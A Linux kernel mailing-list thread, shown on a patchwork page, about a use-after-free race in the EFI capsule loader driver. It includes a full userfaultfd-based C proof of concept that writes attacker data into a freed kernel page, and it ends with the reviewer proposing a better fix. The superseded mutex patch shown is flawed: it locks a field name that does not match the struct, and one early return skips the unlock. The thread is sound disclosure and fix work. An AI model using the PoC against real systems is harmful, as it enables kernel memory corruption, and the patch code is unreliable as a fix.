Message ID | 20220626103248.GA57385@ubuntu |
---|---|
State | Superseded |
Headers | show |
Series | efi/capsule-loader: Fix use-after-free in efi_capsule_write | expand |
On Sun, 26 Jun 2022 at 12:32, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > If the user calls close() during a copy operation in copy_from_user() of efi_capsule_write(), > a race condition may occur in which the user's buffer is copied to the freed page. > > This is because .flush of file_operations is called unconditionally > regardless of ->f_count, unlike .release. > > This driver is writable only with root privileges, so it is not a security vulnerability. > However, it is recommended to add mutexes to efi_capsule_write() and efi_capsule_flush() > as root can accidentally break the page while in use. > Apologies for the late reply. Could you please elaborate? I.e., describe in more detail how the race condition may occur? Thanks, > Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com> > --- > drivers/firmware/efi/capsule-loader.c | 12 ++++++++++++ > include/linux/efi.h | 1 + > 2 files changed, 13 insertions(+) > > diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c > index 4dde8edd53b6..e50ede51ef38 100644 > --- a/drivers/firmware/efi/capsule-loader.c > +++ b/drivers/firmware/efi/capsule-loader.c > @@ -177,6 +177,8 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, > if (count == 0) > return 0; > > + mutex_lock(&cap_info->write_lock); > + > /* Return error while NO_FURTHER_WRITE_ACTION is flagged */ > if (cap_info->index < 0) > return -EIO; > @@ -233,12 +235,16 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, > goto failed; > } > > + mutex_unlock(&cap_info->write_lock); > + > return write_byte; > > fail_unmap: > kunmap(page); > failed: > efi_free_all_buff_pages(cap_info); > + mutex_unlock(&cap_info->write_lock); > + > return ret; > } > > @@ -256,12 +262,16 @@ static int efi_capsule_flush(struct file *file, fl_owner_t id) > int ret = 0; > struct capsule_info *cap_info = file->private_data; > > + mutex_lock(&cap_info->write_lock); > + > if (cap_info->index > 0) { > 
pr_err("capsule upload not complete\n"); > efi_free_all_buff_pages(cap_info); > ret = -ECANCELED; > } > > + mutex_unlock(&cap_info->write_lock); > + > return ret; > } > > @@ -315,6 +325,8 @@ static int efi_capsule_open(struct inode *inode, struct file *file) > return -ENOMEM; > } > > + mutex_init(&cap_info->write_lock); > + > file->private_data = cap_info; > > return 0; > diff --git a/include/linux/efi.h b/include/linux/efi.h > index 7d9b0bb47eb3..e274c4e8d7c6 100644 > --- a/include/linux/efi.h > +++ b/include/linux/efi.h > @@ -204,6 +204,7 @@ struct efi_image_auth { > struct capsule_info { > efi_capsule_header_t header; > efi_capsule_header_t *capsule; > + struct mutex write_mutex; > int reset_type; > long index; > size_t count; > -- > 2.25.1 > > Dear all, > > I submitted this patch 2 weeks ago, this is my 3rd submission of this patch. > > Can I get feedback on this patch? > > Regards, > Hyunwoo Kim.
On Wed, Sep 07, 2022 at 10:30:44AM +0200, Ard Biesheuvel wrote: > Could you please elaborate? I.e., describe in more detail how the race > condition may occur? The exploit flow is as follows: ``` cpu0 cpu1 1. write() . . efi_capsule_write() copy_from_user() <- userfaultfd set 2. close(fd) __x64_sys_close() close_fd() filp_close() filp->f_op->flush(filp, id) efi_capsule_flush() efi_free_all_buff_pages() __free_page() 3. copy_from_user() <- userfaultfd release, UAF ``` 1. Call write() on the EFI capsule device in one thread. It stalls at copy_from_user() in efi_capsule_write() because the userspace buffer passed to write() is registered with userfaultfd. 2. close() the EFI capsule device in another thread. This causes the .flush callback of efi_capsule_fops to be called, but not the .release callback. This is because .release of struct file_operations is called only when other operations are finished, whereas .flush is called by the kernel as soon as close() is called. As a result, the kernel page that copy_from_user() was copying into is freed by __free_page(). 3. Resolve the pending userfaultfd fault so that the thread that called write() resumes. This causes a UAF that allows the user to write the desired data to the freed page. Note: userfaultfd only increases the reliability of the exploit; the UAF can still occur even if userfaultfd is disabled. 
The poc code that triggers the vulnerability is: ``` #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdbool.h> #include <unistd.h> #include <string.h> #include <fcntl.h> #include <pthread.h> #include <errno.h> #include <sched.h> #include <malloc.h> #include <poll.h> #include <pty.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <sys/wait.h> #include <sys/mman.h> #include <sys/socket.h> #include <sys/ipc.h> #include <linux/userfaultfd.h> #define CPU_0 1 #define CPU_1 2 #define CPU_2 3 #define CPU_3 4 #define UFFD_COUNT 1 #define die() do { \ fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \ exit(EXIT_FAILURE); \ } while (0) int fd; int page_size; int set1 = 0; int set2 = 0; char *addr; void set_affinity(unsigned long mask) { if (pthread_setaffinity_np(pthread_self(), sizeof(mask), (cpu_set_t *)&mask) < 0) { perror("pthread_setaffinity_np"); } return; } static void *fault_handler_thread(void *arg) { static struct uffd_msg msg; long uffd; static char *page = NULL; struct uffdio_copy uffdio_copy; ssize_t nwrite; int qid; uintptr_t fault_addr; uffd = (long)arg; if (page == NULL) { page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED){ perror("mmap"); die(); } } for (;;) { struct pollfd pollfd; int nwritey; pollfd.fd = uffd; pollfd.events = POLLIN; nwritey = poll(&pollfd, 1, -1); if (nwritey == -1) { perror("poll"); die(); } nwrite = read(uffd, &msg, sizeof(msg)); if (nwrite == 0) { printf("EOF on userfaultfd!\n"); die(); } if (nwrite == -1) { perror("write"); die(); } if (msg.event != UFFD_EVENT_PAGEFAULT) { perror("Unexpected event on userfaultfd"); die(); } fault_addr = msg.arg.pagefault.address; if (fault_addr == addr) { printf("[step 3] write ufd stuck pid : %d\n", syscall(SYS_gettid)); while(!set1); memset(page, 0x42, page_size); uffdio_copy.src = (unsigned long)page; uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1); uffdio_copy.len = 
page_size; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) { perror("fault_handler_thwrite() - ioctl-UFFDIO_COPY case 1"); die(); } } } } void set_userfaultfd(void) { long uffd[UFFD_COUNT]; struct uffdio_api uffdio_api[UFFD_COUNT]; struct uffdio_register uffdio_register; pthread_t pf_hdr[UFFD_COUNT]; int p[UFFD_COUNT]; unsigned int size; page_size = sysconf(_SC_PAGE_SIZE); size = page_size; addr = (char *)mmap(NULL, page_size * UFFD_COUNT, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* userfaultfd handler thwrites */ for (int i=0; i<UFFD_COUNT; i++) { uffd[i] = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd[i] == -1) { perror("syscall : userfaultfd"); die(); } uffdio_api[i].api = UFFD_API; uffdio_api[i].features = 0; if (ioctl(uffd[i], UFFDIO_API, &uffdio_api[i]) == -1) { perror("ioctl() : UFFDIO_API"); die(); } uffdio_register.range.start = (unsigned long)(addr + (page_size * i)); uffdio_register.range.len = size; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd[i], UFFDIO_REGISTER, &uffdio_register) == -1) { perror("ioctl() : UFFDIO_REGISTER"); die(); } p[i] = pthread_create(&pf_hdr[i], NULL, fault_handler_thread, (void *)uffd[i]); if (p[i] != 0) { perror("pthread_create : page_fault_handler_thread"); die(); } } } void *efi_write(void) { int ret; set_affinity(CPU_0); printf("[step 2] write before cpu 1 pid : %d\n", syscall(SYS_gettid)); ret = write(fd, addr, 1024); printf("[step 7] write after ret : %d cpu 1 pid : %d\n", ret, syscall(SYS_gettid)); } void *efi_flush(void) { int ret; sleep(5); printf("[step 4] close() before cpu 2 pid : %d\n", syscall(SYS_gettid)); set_affinity(CPU_1); ret = close(fd); sleep(5); /* * * allocate a "page" to be victimized here * */ printf("[step 5] close() after : %d cpu 2 pid : %d\n", ret, syscall(SYS_gettid)); sleep(5); set1 = 1; printf("[step 6] write ufd end cpu 2 pid : %d\n", syscall(SYS_gettid)); } int main() { pthread_t pf_hdr; int 
p1, p2; int status1, status2; pthread_t hdr1, hdr2; //set_affinity(CPU_0); set_userfaultfd(); fd = open("/dev/efi_capsule_loader", O_WRONLY); printf("[step 1] open fd = %d cpu 0 pid : %d\n", fd, syscall(SYS_gettid)); p1 = pthread_create(&hdr1, NULL, efi_write, (void *)NULL); if (p1 != 0) { perror("pthread_create 1"); die(); } p2 = pthread_create(&hdr2, NULL, efi_flush, (void *)NULL); if (p2 != 0) { perror("pthread_create 2"); die(); } pthread_join(hdr1, (void **)&status1); pthread_join(hdr2, (void **)&status2); printf("done pid : %d\n", syscall(SYS_gettid)); return 0; } ``` Since the description of the patch I sent you earlier is ambiguous, and the current include/linux/efi.h code has changed, I will send you the v2 patch again. Regards, Hyunwoo Kim.
On Wed, 7 Sept 2022 at 12:29, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > On Wed, Sep 07, 2022 at 10:30:44AM +0200, Ard Biesheuvel wrote: > > Could you please elaborate? I.e., describe in more detail how the race > > condition may occur? > > The exploit flow is as follows: > ``` > cpu0 cpu1 > 1. write() > . > . > efi_capsule_write() > copy_from_user() <- userfaultfd set > 2. close(fd) > __x64_sys_close() > close_fd() > filp_close() > filp->f_op->flush(filp, id) > efi_capsule_flush() > efi_free_all_buff_pages() > __free_page() > 3. copy_from_user() <- userfaultfd release, UAF > ``` > > 1. Call write to the efi capsule on the thread. > It stops at copy_from_user() in efi_capsule_write() > because userfaultfd passes the set userspace address when calling write. > > 2. close() the efi capsule in another thread. > This causes the .release callback of efi_capsule_fops to not be called, > but the .flush callback to be called. > This is because .release of struct file_operations is called only when other operations are finished, > whereas .flush is called by the kernel as soon as close() is called. > This causes the kernel address that copy_from_user() was copying to be freed by __free_page(). > > 3. Release userfaultfd from the thread that called write(). > This causes a UAF that allows the user to write the desired data to the freed page. > > + Since userfaultfd only increases the stability of the exploit, UAF will still occur even if userfaultfd is disabled. 
> > > The poc code that triggers the vulnerability is: > ``` > #include <stdio.h> > #include <stdlib.h> > #include <stdint.h> > #include <stdbool.h> > #include <unistd.h> > #include <string.h> > #include <fcntl.h> > #include <pthread.h> > #include <errno.h> > #include <sched.h> > #include <malloc.h> > #include <poll.h> > #include <pty.h> > #include <sys/syscall.h> > #include <sys/ioctl.h> > #include <sys/wait.h> > #include <sys/mman.h> > #include <sys/socket.h> > #include <sys/ipc.h> > #include <linux/userfaultfd.h> > > > #define CPU_0 1 > #define CPU_1 2 > #define CPU_2 3 > #define CPU_3 4 > #define UFFD_COUNT 1 > > #define die() do { \ > fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \ > exit(EXIT_FAILURE); \ > } while (0) > > > int fd; > int page_size; > int set1 = 0; > int set2 = 0; > char *addr; > > > void set_affinity(unsigned long mask) { > if (pthread_setaffinity_np(pthread_self(), sizeof(mask), (cpu_set_t *)&mask) < 0) { > perror("pthread_setaffinity_np"); > } > > return; > } > > static void *fault_handler_thread(void *arg) { > static struct uffd_msg msg; > long uffd; > static char *page = NULL; > struct uffdio_copy uffdio_copy; > ssize_t nwrite; > int qid; > uintptr_t fault_addr; > > uffd = (long)arg; > > if (page == NULL) { > page = mmap(NULL, page_size, > PROT_READ | PROT_WRITE, > MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); > if (page == MAP_FAILED){ > perror("mmap"); > die(); > } > } > > for (;;) { > struct pollfd pollfd; > int nwritey; > pollfd.fd = uffd; > pollfd.events = POLLIN; > nwritey = poll(&pollfd, 1, -1); > if (nwritey == -1) { > perror("poll"); > die(); > } > > nwrite = read(uffd, &msg, sizeof(msg)); > if (nwrite == 0) { > printf("EOF on userfaultfd!\n"); > die(); > } > > if (nwrite == -1) { > perror("write"); > die(); > } > > if (msg.event != UFFD_EVENT_PAGEFAULT) { > perror("Unexpected event on userfaultfd"); > die(); > } > > fault_addr = msg.arg.pagefault.address; > > if (fault_addr == addr) { > > printf("[step 3] write ufd stuck pid 
: %d\n", syscall(SYS_gettid)); > > while(!set1); > > memset(page, 0x42, page_size); > > uffdio_copy.src = (unsigned long)page; > uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1); > uffdio_copy.len = page_size; > uffdio_copy.mode = 0; > uffdio_copy.copy = 0; > if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) { > perror("fault_handler_thwrite() - ioctl-UFFDIO_COPY case 1"); > die(); > } > } > } > } > > void set_userfaultfd(void) { > long uffd[UFFD_COUNT]; > struct uffdio_api uffdio_api[UFFD_COUNT]; > struct uffdio_register uffdio_register; > pthread_t pf_hdr[UFFD_COUNT]; > int p[UFFD_COUNT]; > unsigned int size; > > page_size = sysconf(_SC_PAGE_SIZE); > size = page_size; > > addr = (char *)mmap(NULL, > page_size * UFFD_COUNT, > PROT_READ | PROT_WRITE, > MAP_PRIVATE | MAP_ANONYMOUS, > -1, 0); > > /* userfaultfd handler thwrites */ > for (int i=0; i<UFFD_COUNT; i++) { > uffd[i] = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); > if (uffd[i] == -1) { > perror("syscall : userfaultfd"); > die(); > } > > uffdio_api[i].api = UFFD_API; > uffdio_api[i].features = 0; > if (ioctl(uffd[i], UFFDIO_API, &uffdio_api[i]) == -1) { > perror("ioctl() : UFFDIO_API"); > die(); > } > > uffdio_register.range.start = (unsigned long)(addr + (page_size * i)); > uffdio_register.range.len = size; > uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; > if (ioctl(uffd[i], UFFDIO_REGISTER, &uffdio_register) == -1) { > perror("ioctl() : UFFDIO_REGISTER"); > die(); > } > > p[i] = pthread_create(&pf_hdr[i], NULL, fault_handler_thread, (void *)uffd[i]); > if (p[i] != 0) { > perror("pthread_create : page_fault_handler_thread"); > die(); > } > } > } > > void *efi_write(void) { > int ret; > > set_affinity(CPU_0); > > printf("[step 2] write before cpu 1 pid : %d\n", syscall(SYS_gettid)); > > ret = write(fd, addr, 1024); > > printf("[step 7] write after ret : %d cpu 1 pid : %d\n", ret, syscall(SYS_gettid)); > } > > void *efi_flush(void) { > int ret; > > sleep(5); > > 
printf("[step 4] close() before cpu 2 pid : %d\n", syscall(SYS_gettid)); > > set_affinity(CPU_1); > ret = close(fd); > > sleep(5); > > /* > * > * allocate a "page" to be victimized here > * > */ > > printf("[step 5] close() after : %d cpu 2 pid : %d\n", ret, syscall(SYS_gettid)); > > sleep(5); > > set1 = 1; > printf("[step 6] write ufd end cpu 2 pid : %d\n", syscall(SYS_gettid)); > } > > > int main() { > pthread_t pf_hdr; > int p1, p2; > int status1, status2; > pthread_t hdr1, hdr2; > > //set_affinity(CPU_0); > > set_userfaultfd(); > > fd = open("/dev/efi_capsule_loader", O_WRONLY); > printf("[step 1] open fd = %d cpu 0 pid : %d\n", fd, syscall(SYS_gettid)); > > p1 = pthread_create(&hdr1, NULL, efi_write, (void *)NULL); > if (p1 != 0) { > perror("pthread_create 1"); > die(); > } > > p2 = pthread_create(&hdr2, NULL, efi_flush, (void *)NULL); > if (p2 != 0) { > perror("pthread_create 2"); > die(); > } > > pthread_join(hdr1, (void **)&status1); > pthread_join(hdr2, (void **)&status2); > > printf("done pid : %d\n", syscall(SYS_gettid)); > > return 0; > } > ``` > > Since the description of the patch I sent you earlier is ambiguous, > and the current include/linux/efi.h code has changed, I will send you the v2 patch again. > Thanks. This is very useful, and I managed to reproduce the issue. As far as your fix is concerned: wouldn't it be better to move the freeing of the pages to the release hook? Semantically, flush is not the right place for this, AFAICT.
On Wed, Sep 07, 2022 at 04:40:08PM +0200, Ard Biesheuvel wrote: > As far as your fix is concerned: wouldn't it be better to move the > freeing of the pages to the release hook? Semantically, flush is not > the right place for this, AFAICT. You're right. Freeing the buffer in .flush is wrong. I also think it's appropriate to move the buffer release part to .release. But looking at the comment, /** * efi_capsule_flush - called by file close or file flush * @file: file pointer * @id: not used * * If a capsule is being partially uploaded then calling this function * will be treated as upload termination and will free those completed * buffer pages and -ECANCELED will be returned. **/ efi_capsule_flush() seems to exist for the purpose of canceling an upload partway through. If the buffer release is moved to .release, will there be any compatibility issues?
On Wed, Sep 07, 2022 at 07:54:26AM -0700, Hyunwoo Kim wrote: > efi_capsule_flush() seems to exist for the purpose of canceling uploads in the middle. > > If buffer release is moved to .release, will there be any compatibility issues? Capsules are submitted by the user calling write() multiple times, rather than by a single copy operation processed all at once inside efi_capsule_write(). In other words, if you just call close() when you want to cancel an upload, .release is automatically called after write() is finished, and the upload is stopped. So there is no need for .flush to exist. So I think it would be ok to move the buffer free part to .release. I'll submit a v4 patch that moves the buffer free part to .release.
On Wed, 7 Sept 2022 at 17:17, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > On Wed, Sep 07, 2022 at 07:54:26AM -0700, Hyunwoo Kim wrote: > > efi_capsule_flush() seems to exist for the purpose of canceling uploads in the middle. > > > > If buffer release is moved to .release, will there be any compatibility issues? > > The way to submit capsules is to submit by calling write() multiple times by the user, > rather than in a structure that processes the copy operation at once inside efi_capsule_write(). > In other words, if you just call close() when you want to cancel upload, > .release is automatically called after write() is finished, and upload is stopped. > So there is no need for .flush to exist. > > So I think it would be ok to move the buffer free part to .release. > > I'll submit you a v4 patch that moves the buffre free part to .release. OK
diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c index 4dde8edd53b6..e50ede51ef38 100644 --- a/drivers/firmware/efi/capsule-loader.c +++ b/drivers/firmware/efi/capsule-loader.c @@ -177,6 +177,8 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, if (count == 0) return 0; + mutex_lock(&cap_info->write_lock); + /* Return error while NO_FURTHER_WRITE_ACTION is flagged */ if (cap_info->index < 0) return -EIO; @@ -233,12 +235,16 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, goto failed; } + mutex_unlock(&cap_info->write_lock); + return write_byte; fail_unmap: kunmap(page); failed: efi_free_all_buff_pages(cap_info); + mutex_unlock(&cap_info->write_lock); + return ret; } @@ -256,12 +262,16 @@ static int efi_capsule_flush(struct file *file, fl_owner_t id) int ret = 0; struct capsule_info *cap_info = file->private_data; + mutex_lock(&cap_info->write_lock); + if (cap_info->index > 0) { pr_err("capsule upload not complete\n"); efi_free_all_buff_pages(cap_info); ret = -ECANCELED; } + mutex_unlock(&cap_info->write_lock); + return ret; } @@ -315,6 +325,8 @@ static int efi_capsule_open(struct inode *inode, struct file *file) return -ENOMEM; } + mutex_init(&cap_info->write_lock); + file->private_data = cap_info; return 0; diff --git a/include/linux/efi.h b/include/linux/efi.h index 7d9b0bb47eb3..e274c4e8d7c6 100644 --- a/include/linux/efi.h +++ b/include/linux/efi.h @@ -204,6 +204,7 @@ struct efi_image_auth { struct capsule_info { efi_capsule_header_t header; efi_capsule_header_t *capsule; + struct mutex write_mutex; int reset_type; long index; size_t count;
If the user calls close() during a copy operation in copy_from_user() of efi_capsule_write(), a race condition may occur in which the user's buffer is copied to the freed page. This is because .flush of file_operations is called unconditionally regardless of ->f_count, unlike .release. This driver is writable only with root privileges, so it is not a security vulnerability. However, it is recommended to add mutexes to efi_capsule_write() and efi_capsule_flush() as root can accidentally break the page while in use. Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com> --- drivers/firmware/efi/capsule-loader.c | 12 ++++++++++++ include/linux/efi.h | 1 + 2 files changed, 13 insertions(+)